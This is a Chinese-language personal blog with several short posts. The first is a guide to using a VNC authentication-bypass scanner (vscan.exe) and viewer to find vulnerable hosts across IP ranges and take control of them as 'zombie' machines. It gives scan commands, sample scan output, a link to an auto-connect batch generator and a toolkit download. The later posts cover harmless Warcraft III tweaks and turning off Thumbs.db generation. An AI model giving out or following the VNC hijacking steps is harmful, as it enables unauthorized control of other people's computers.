Maker's blog

VNC(virtual network computing),是一种由AT&T开发的远程控制的技术,简单来说,就是将远端的图形桌面显示到本地终端.有点类似微软的3389.

VNC漏洞利用工具包括两部分vscan.exe(在一些工具包中也叫VNC_bypauth.exe),主要用来扫描有vnc漏洞的主机.还有一个VNCLink.exe,这个也就是VNC Viewer,是一款vnc连接工具,类似3389.

国外很多的计算机都开启了vnc服务,我们可以利用vnc漏洞来进行抓肉鸡.

vscan的使用格式如下

vscan.exe -i StarIP-EndIP -p Port  -vnc -Option

例子:

vscan.exe -i 192.168.0.0-192.168.255.255 -p 5900 -vnc -vv

扫描完毕vscan会将结果保存在VNC_pauth.txt文件中.

文件内容如下

[php]—————————————————————————-
COMMAND: vscan.exe -i 192.168.0.0-192.168.255.255 -p 5900 -vnc -w
—————————————————————————-
192.168.139.170  :5900     connection closed
192.168.139.170  :5900     vnc4:banned
192.168.139.23   :5900     vnc4:patched
192.168.139.122  :5900     vnc4:patched
192.168.139.188  :5900     vnc4:patched
192.168.139.75   :5900     vnc4:banned
192.168.139.160  :5900     vnc4:VULNERABLE
192.168.139.181  :5900     vnc4:banned
192.168.139.251  :5900     vnc4:patched
192.168.139.89   :5900     vnc4:banned
192.168.139.110  :5900     vnc4:patched
—————————————————————————-
Scan complete
——————————————–[heapoverflow.com 2004-2005]—-[/php]

类似192.168.139.160  :5900     vnc4:VULNERABLE这样后面有vnc4:VULNERABLE的就是可以连接的主机了,可以用VNCLink.exe直接连接.

如果连接上去的时候对方没有锁定计算机,那么恭喜你,你已经拿到一台肉鸡了.

因为扫描后要手动连接主机去验证主机是否可以控制,那么不停的连接就会变的很麻烦,这里给大家提供一个我自己写的工具来自动筛选可连接ip并且生成批处理程序自动进行连接,

工具地址 http://www.foolbird.net/online/vnc/

将你的vnc viewer路径填上,再将VNC_pauth.txt的内容粘贴到文本框中,然后进行生成,当出现结果页的时候查看网页的源代码,然后以.bat格式保存就可以了.

然后就可以用所生成批处理文件来进行自动连接了.

附件:vnc.rar(143206 Byte)

很多时候我们需要一边游戏一边聊天,那么就要在游戏和桌面间不停的切换,如果使用窗口化运行游戏,一切就会更加方便.

首先你需要在桌面创建一个魔兽争霸3冰封王座的快捷方式,如果已经有了就不用再创建了,然后右键点快捷方式,点击属性.

在你的魔兽争霸路径.exe”之后加上” -window”,注意前面要加一个空格,而且要在双引号之后加,然后确定.

在浩方里使用窗口化模式运行魔兽争霸3冰封王座:

先登陆浩方对战平台,进入设置页面,在左面的游戏列表中找到寒冰王座,单击.

右侧出现游戏运行的参数选项,在”2.游戏运行参数”中填”-window”,确定.

搞定.

今天有发现硬盘里有Thumbs.db文件了,删掉之后过了不久又出现了,以前也发现过,以为是病毒呢,但现在装了正版金山,怎么还会出现呢?

到网上一番搜索之后发现Thumbs.db并不是病毒.

Thumbs.db只是一个图片索引文件，可以加速你用缩略图方式查看图片,会随着文件夹的图片的增多也体积增大.本来只要你硬盘够大,这个文件也没什么影响,但很多朋友在上传东西到服务器时,往往会不小心把这个文件也传了上去,有点不好.

从Windows 98开始,系统增加了图片预览功能,保存了图片的文件夹下会产生一个名为”Thumbs.db”的文件,这个文件会随着图片文件的增加而膨胀.奇怪的是,这个文件被删除后下次预览图片时它又会自动生成.

下面教大家如何让系统不生成Thumbs.db.

在”控制面板”中打开”文件夹选项”,在”文件夹选项”对话框中切换到”查看”标签,在”不缓存缩略图”复选框前打上”√”,再点击”确定”按钮退出即可.

好,现在我们可以确保不会在生成Thumbs.db了,但是已经生成的Thumbs.db是不会自动消失的,需要手动将硬盘中的Thumbs.db全部删掉.

打开资源管理器或者我的电脑,点击工具栏上的”搜索”按钮或按快捷键Ctrl+F,在我的电脑范围内搜索Thumbs.db,按立即搜索,

等到出现搜索结果之后Ctrl+A选中全部文件,删除就OK了.

这里也需要使用一个工具,请下载附件.

下载完毕之后打开软件,点浏览

找到魔兽安装目录下的 War3 Patch.MPQ  点确定

修改第二行的名字,修改 (%s) 前面的东西,要保证(%s) 不被去掉

点确定

附件:魔兽争霸主机名修改器.rar(241871 Byte)

这里要用到一款工具,请大家自行下载,在这篇文章的附件里.

先开游戏进入到局域网里面
先打开工具里面的   LanNameSpoofer.exe
点Patch 出现如图

选择Choose color

选择一个颜色

点 Begin color

在输入栏出现

在8000后面添加名字,比如Jay, 不过最多只能使用3个字母…

打好之后,点End color

把文本框里的字符串复制到游戏中输入名字的文本框中.

再建立主机,修改成功!

附件:魔兽争霸名字颜色修改器.rar(223935 Byte)